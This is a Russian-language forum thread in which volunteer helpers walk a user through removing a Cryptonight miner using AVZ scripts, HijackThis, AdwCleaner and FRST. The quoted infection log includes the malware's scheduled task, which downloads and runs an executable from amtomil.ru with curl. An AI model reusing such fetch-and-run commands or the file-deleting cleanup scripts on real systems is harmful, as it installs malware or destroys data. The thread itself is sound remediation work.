Решена JS:Cryptonight[Trj] Помогите, пожалуйста!

Статус
В этой теме нельзя размещать новые ответы.

zo_rick

Новый пользователь
Сообщения
10
Реакции
0
Здравствуйте! Где-то неделю назад мой компьютер стал прилично притормаживать, ЦП нагружается до 50%, память на диске С стремительно исчезает. Не нашел никаких папок Cryptonight(может плохо искал). Антивирус AVG ничего не увидел, установил Avast сразу начал выдавать предупреждение о данном вирусе JS:Cryptonight[Trj], но ничего с ним сделать не может. При каждой перезагрузке забивается память. Вчера выключил компьютер с 50Гб на С, сегодня включаю уже 27Гб. До создания логов на AVZ я удалил Google Chrome, но корневые папки оставил. нужно ли мне устанавливать Хром и сканировать заново? Помогите, пожалуйста, а то скоро без лаптопа останусь.
 

Вложения

  • CollectionLog-2018.05.22-17.19.zip
    159.6 KB · Просмотры: 14
Здравствуйте!
Программа Tencent Gaming Buddy - сами установили?

Настройки DNS ваши?
Код:
178.132.6.57
193.238.153.54
35.177.46.238
46.101.28.31
82.202.226.203

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):

Код:
begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
QuarantineFile('C:\Users\Zo_rick\AppData\Local\SJsSmnnoXoA.bat', '');
QuarantineFile('C:\Users\Zo_rick\AppData\Local\vymftvIiGM.bat', '');
QuarantineFile('C:\Users\Zo_rick\AppData\Roaming\curl\curl.exe', '');
QuarantineFile('C:\Users\Zo_rick\AppData\Roaming\CurrencyConvertor\app.py', '');
QuarantineFile('C:\Users\Zo_rick\AppData\Roaming\CurrencyConvertor\ml.py', '');
QuarantineFile('C:\Users\Zo_rick\AppData\Roaming\CurrencyConvertor\python\pythonw.exe', '');
QuarantineFile('C:\Users\Zo_rick\AppData\Roaming\SETUPS~1\ml.py', '');
QuarantineFile('C:\Users\Zo_rick\AppData\Roaming\SETUPS~1\python\pythonw.exe', '');
QuarantineFile('C:\Users\Zo_rick\AppData\Roaming\setupsk\ml.py', '');
QuarantineFile('C:\Users\Zo_rick\AppData\Roaming\setupsk\python\pythonw.exe', '');
DeleteFile('C:\Users\Zo_rick\AppData\Local\SJsSmnnoXoA.bat', '64');
DeleteFile('C:\Users\Zo_rick\AppData\Local\vymftvIiGM.bat', '64');
DeleteFile('C:\Users\Zo_rick\AppData\Roaming\curl\curl.exe', '64');
DeleteFile('C:\Users\Zo_rick\AppData\Roaming\curl\curl.exe', '64');
DeleteFile('C:\Users\Zo_rick\AppData\Roaming\CurrencyConvertor\python\pythonw.exe', '64');
DeleteFile('C:\Users\Zo_rick\AppData\Roaming\SETUPS~1\ml.py', '64');
DeleteFile('C:\Users\Zo_rick\AppData\Roaming\SETUPS~1\python\pythonw.exe', '64');
DeleteFile('C:\Users\Zo_rick\AppData\Roaming\setupsk\ml.py', '64');
DeleteFile('C:\Users\Zo_rick\AppData\Roaming\setupsk\python\pythonw.exe', '64');
DeleteFile('C:\WINDOWS\system32\Tasks\{704B1058-6981-4DFF-B521-E0E3DEA27878}', 'x64');
DeleteFile('C:\WINDOWS\system32\Tasks\curl', 'x64');
DeleteFile('C:\WINDOWS\system32\Tasks\curls', 'x64');
DeleteFile('C:\WINDOWS\system32\Tasks\CurrencyConvertor', 'x64');
DeleteFile('C:\WINDOWS\system32\Tasks\CurrencyConvertor2', 'x64');
DeleteFile('C:\WINDOWS\system32\Tasks\cyyMvLzPGa', 'x64');
DeleteFile('C:\WINDOWS\system32\Tasks\Scheduled Update S-1-8-22', 'x64');
DeleteFile('C:\WINDOWS\system32\Tasks\setupsk', 'x64');
DeleteFile('C:\WINDOWS\system32\Tasks\setupsk_upd', 'x64');
DeleteFile('C:\WINDOWS\system32\Tasks\xWwMI', 'x64');
ExecuteFile('schtasks.exe', '/delete /TN "curl" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "curls" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "CurrencyConvertor" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "cyyMvLzPGa" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "Scheduled Update S-1-8-22" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "setupsk" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "setupsk_upd" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "xWwMI" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "CurrencyConvertor2" /F', 0, 15000, true);
BC_ImportALL;
ExecuteSysClean;
BC_Activate;
ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.

Компьютер перезагрузится. После перезагрузки, выполните такой скрипт:

Код:
begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.

Файл quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью этой формы или (если размер архива превышает 8 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.

"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):
Код:
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E9410C70-B6AE-41FF-AB71-32F4B279EA5F} [SuggestionsURLFallback] = http://clients5.google.com/complete/search?q={searchTerms}&hl={language}&gl={language}&client=ie8&mw={ie:maxWidth}&sh={ie:sectionHeight}&rh={ie:rowHeight}&inputencoding={inputEncoding}&outputencoding={outputEncoding} - Google
O2 - HKLM\..\BHO: (no name) - {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers: 00asw - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O22 - Task: (disabled) Scheduled Update S-1-8-22 - C:\WINDOWS\explorer.exe http://rokomi.ru
O22 - Task: CurrencyConvertor - C:\Users\Zo_rick\AppData\Roaming\CurrencyConvertor\python\pythonw.exe "C:\Users\Zo_rick\AppData\Roaming\CurrencyConvertor\ml.py" --APPNAME="CurrencyConvertor" (file missing)
O22 - Task: CurrencyConvertor2 - C:\Users\Zo_rick\AppData\Roaming\CurrencyConvertor\python\pythonw.exe "C:\Users\Zo_rick\AppData\Roaming\CurrencyConvertor\app.py" (file missing)
O22 - Task: curl - C:\Users\Zo_rick\AppData\Roaming\curl\curl_7_54.exe -f -L http://amtomil.ru/f.exe -o C:\Users\Zo_rick\AppData\Roaming\curl\curl.exe
O22 - Task: curls - C:\Users\Zo_rick\AppData\Roaming\curl\curl.exe (file missing)
O22 - Task: cyyMvLzPGa - C:\Users\Zo_rick\AppData\Local\vymftvIiGM.bat (file missing)
O22 - Task: setupsk - C:\Users\Zo_rick\AppData\Roaming\setupsk\python\pythonw.exe "C:\Users\Zo_rick\AppData\Roaming\setupsk\ml.py" --APPNAME="setupsk" (file missing)
O22 - Task: setupsk_upd - C:\Users\Zo_rick\AppData\Roaming\SETUPS~1\python\pythonw.exe "C:\Users\Zo_rick\AppData\Roaming\SETUPS~1\ml.py" --APPNAME="setupsk_upd" (file missing)
O22 - Task: xWwMI - C:\Users\Zo_rick\AppData\Local\SJsSmnnoXoA.bat (file missing)

  • Скачайте AdwCleaner и сохраните его на Рабочем столе.
  • Запустите его (в ОС Vista/Windows 7, 8, 8.1, 10 необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan" ("Сканировать") и дождитесь окончания сканирования.
  • Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\AdwCleaner[S1].txt.
  • Прикрепите отчет к своему следующему сообщению.

Подробнее читайте в этом руководстве.
 
Последнее редактирование:
  • Like
Реакции: akok
DNS мои.
Программу tencent gaming buddy сам скачивал.
отключил антивирус, прогнал скрипт, прошло удачно пишет, но комп не перезагрузился. продолжить второй скрипт?

UPD: Решил сам перезагрузить
 
Последнее редактирование:
Поправил скрипт, давайте заново.
 
Отправил файл quarantine.zip

UPD: B HijackThis смог пофиксить только первые 3 строки.

R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E9410C70-B6AE-41FF-AB71-32F4B279EA5F} [SuggestionsURLFallback] = http://clients5.google.com/complete/search?...
O2 - HKLM\..\BHO: (no name) - {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers: 00asw - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)

UPD2: AdwCleaner
 

Вложения

  • AdwCleaner[S1].txt
    3.7 KB · Просмотры: 13
Последнее редактирование:
- Удалите в AdwCleaner всё кроме папок от mail.ru - если программами от mail.ru не пользуетесь, то их тоже удалите. Отчет после удаления прикрепите.

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Отметьте галочкой также "Shortcut.txt".

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt, Shortcut.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
 
AdwCleaner logs
FRST logs
 

Вложения

  • AdwCleaner[S02].txt
    1.4 KB · Просмотры: 12
  • Shortcut.txt
    81.5 KB · Просмотры: 11
  • FRST.txt
    93 KB · Просмотры: 14
  • Addition.txt
    71.8 KB · Просмотры: 13
Лог удаления ADW имеет префикс "С", а не "S"
Killer Control Center - используете?
Tencent Gaming Buddy - используете?
  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Код:
    Start::
    CreateRestorePoint:
    VirusTotal: C:\Program Files (x86)\SCM\SCM.exe
    GroupPolicy: Restriction ? <==== ATTENTION
    GroupPolicy\User: Restriction ? <==== ATTENTION
    2017-12-06 22:55 - 2017-09-29 16:42 - 000000070 _____ () C:\Users\Zo_rick\AppData\Local\SJsSmnnoXoA
    2017-12-06 22:55 - 2017-09-29 16:42 - 000000072 _____ () C:\Users\Zo_rick\AppData\Local\vymftvIiGM
    2017-12-06 22:55 - 2017-12-06 22:55 - 000000001 _____ () C:\Users\Zo_rick\AppData\Local\WMI.ini
    2017-12-06 22:55 - 2017-09-29 16:42 - 000001202 _____ () C:\Users\Zo_rick\AppData\Local\WQmMNCWmk
    2017-09-29 16:42 - 2017-09-29 16:42 - 000001202 _____ () C:\Users\Zo_rick\AppData\Local\WQmMNCWmk.bat
    2017-12-06 22:55 - 2017-09-29 16:42 - 000001198 _____ () C:\Users\Zo_rick\AppData\Local\gUnfaSrsnCv
    ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
    ContextMenuHandlers3: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
    ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> No File
    Task: {A7194199-4471-4E71-975F-96481AD14A85} - \{704B1058-6981-4DFF-B521-E0E3DEA27878} -> No File <==== ATTENTION
    AlternateDataStreams: C:\ProgramData\PACE:3B3F2425358D33BE [217]
    AlternateDataStreams: C:\Users\Все пользователи\PACE:3B3F2425358D33BE [217]
    EmptyTemp:
    Reboot:
    End::
  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.
 
Killer Control Center это предустановленная программа. шла вместе со всем софтом. Также другие подозрительные программы как Dragon Center, Burn recovery, Nahimic, SCM тоже были предустановлены. Ноутбук MSI GS63VR 7RF Stealth Pro. Программы используются.
tencet gaming buddy использую, но в принципе могу удалить.
AdwCleaner log C
FRST fixlog

UPD: нагрузка ЦП уменьшилась, но изредка прыгает до 80-100%, также пространство на диске С осталось небольшим.

нет, все-таки частенько нагружается цп до 80
 

Вложения

  • Fixlog.txt
    4.4 KB · Просмотры: 13
  • AdwCleaner[C1].txt
    3.5 KB · Просмотры: 13
Последнее редактирование модератором:
Сделайте свежий лог автологера, проверю систему еще раз.
 
Вот.
 

Вложения

  • CollectionLog-2018.05.23-16.59.zip
    166.6 KB · Просмотры: 12
ой. вот
 

Вложения

  • AdwCleaner[C01].txt
    5.8 KB · Просмотры: 13
Интересная ситуация, он начинает нагружаться, когда я сворачиваю и не открываю диспетчер задач. как только открываю и смотрю активность, так сразу нагрузка падает до 2-15%. Поэтому зафиксировать этот процесс не удается.
Хотя сейчас вроде бы все хорошо. долго уже не нагружается. Еще буду мониторить.
Скажите, как мне найти файлы, которые "съели" мою память на диске С, а то мне страшно искать в системных файлах. Можете с этим помочь?)
 
С этим Вам помогут в системном разделе форума. Тут в завершение:

Подготовьте лог SecurityCheck by glax24

Ознакомьтесь: Рекомендации после лечения

Пополните, пожалуйста, базу безопасных файлов антивирусной утилиты AVZ:
  1. Запустите AVZ.
  2. Выполните обновление баз (Меню Файл - Обновление баз)
  3. Закройте все приложения, и запустите используемый в Вашей системе интернет-браузер (например Internet Explorer, FireFox, Opera и т.д. - если применяется несколько браузеров, то необходимо запустить их все для того чтобы AVZ смог проанализировать используемые браузерами модули расширения и плагины)
  4. В AVZ выберите пункт меню Файл - Стандартные скрипты. В открывшемся окне необходимо отметить скрипт №8 ("VirusInfo.Info: Скрипт сбора файлов для экспресс-анализа ПК") и нажать кнопку "Выполнить отмеченные скрипты". Выполнение скрипта займет некоторое время, порядка 1 - 5 мин. В результате в папке AVZ будет создан подкаталог LOG, в нем архив с именем virusinfo_files_<имя_ПК>.zip
  5. Закачайте полученный архив, как описано на этой странице.
  6. Если размер архива превышает 250 Мб закачайте его на любой файлообменник, не требующий ввода капчи (например: RGhost, Zippyshare, My-Files.RU, karelia.ru, Ge.tt или WebFile) и укажите ссылку на скачивание в своём следующем сообщении.
 
Спасибо Вам за помощь! ЦП достаточно долгое время не нагружается.
SecurityCheck сделал, а вот обновить базы в AVZ не смог, поэтому не решил делать дальше. В меню надпись обновление баз не является активным, не могу нажать.
 

Вложения

  • SecurityCheck.txt
    12.6 KB · Просмотры: 12
Устраните:

Запрос на повышение прав для администраторов отключен
^Рекомендуется включить уровень по умолчанию: Win+R ввести UserAccountControlSettings и Enter^

Отключен общий профиль Брандмауэра Windows
Отключен частный профиль Брандмауэра Windows


WinRAR 5.40 (64-разрядная) v.5.40.0 Внимание! Скачать обновления

Java SE Development Kit 8 Update 131 (64-bit) v.8.0.1310.11 Внимание! Скачать обновления
^Удалите старую версию и установите новую (jdk-8u172-windows-x64.exe)^
Java SE Development Kit 8 Update 131 v.8.0.1310.11 Внимание! Скачать обновления
^Удалите старую версию и установите новую (jdk-8u172-windows-i586.exe)^
QuickTime 7 v.7.79.80.95 Данная программа больше не поддерживается разработчиком и имеет известные проблемы безопасности! Рекомендуется деинсталлировать данное ПО.

Mozilla Firefox 59.0.2 (x64 ru) v.59.0.2 Внимание! Скачать обновления
^Проверьте обновления через меню Справка - О Firefox!^
Yandex v.18.3.1.1232 Внимание! Скачать обновления
^Проверьте обновления через меню Дополнительно - О браузере Yandex!^
Opera Stable 52.0.2871.99 v.52.0.2871.99 Внимание! Скачать обновления
^Проверьте обновления через меню О программе!^

Удачи.
 
В меню надпись обновление баз не является активным, не могу нажать.
Сейчас тестируем новую версию автологера с новой версией AVZ на борту. Сейчас базы не обновляются.
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху Снизу